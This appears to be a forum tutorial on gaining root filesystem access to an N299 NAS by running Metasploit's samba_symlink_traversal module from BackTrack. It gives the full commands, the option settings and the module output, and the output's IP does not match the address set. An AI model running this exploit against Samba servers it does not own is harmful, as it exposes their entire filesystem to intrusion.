NOTE: Because Video folder is scanned by Media Server you must stop it from NAS menu before this exploit.
In order to access root filesystem of N299 we will use linux Back Track
Launch a terminal window and from the terminal we run
After some loading the prompt will be msf >.
At this prompt we type search samba and we wil have a list with available exploits:
msf > search samba
The command will list all available exloits.
Load the first one with the command:
msf > use auxiliary/admin/smb/samba_symlink_traversal
Let's see what are the options:
sf auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBSHARE yes The name of a writeable share on the server
SMBTARGET rootfs yes The name of the directory that should point to the root filesystem
Let's set the options:
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.1.2 (change the IP addres with your own NAS IP addres)
msf auxiliary(samba_symlink_traversal) > set SMBSHARE Video (I set the Video folder from NAS menu to be writtable for everyone)
msf auxiliary(samba_symlink_traversal) > set RPORT 139
msf auxiliary(samba_symlink_traversal) > set SMBTARGET roothack (the folder were the root directory will be mount in the Video folder)
Now we run the command exploit:
msf auxiliary(samba_symlink_traversal) > exploit
Connecting to the server...
Trying to mount writeable share 'Video'...
Trying to link 'roothack' to the root filesystem...
Now access the following share to browse the root filesystem: \10.1.10.10\Video\roothack\
Auxiliary module execution completed
Now if you go to network folder Video you will see a folder roothack with all the files of root filesistem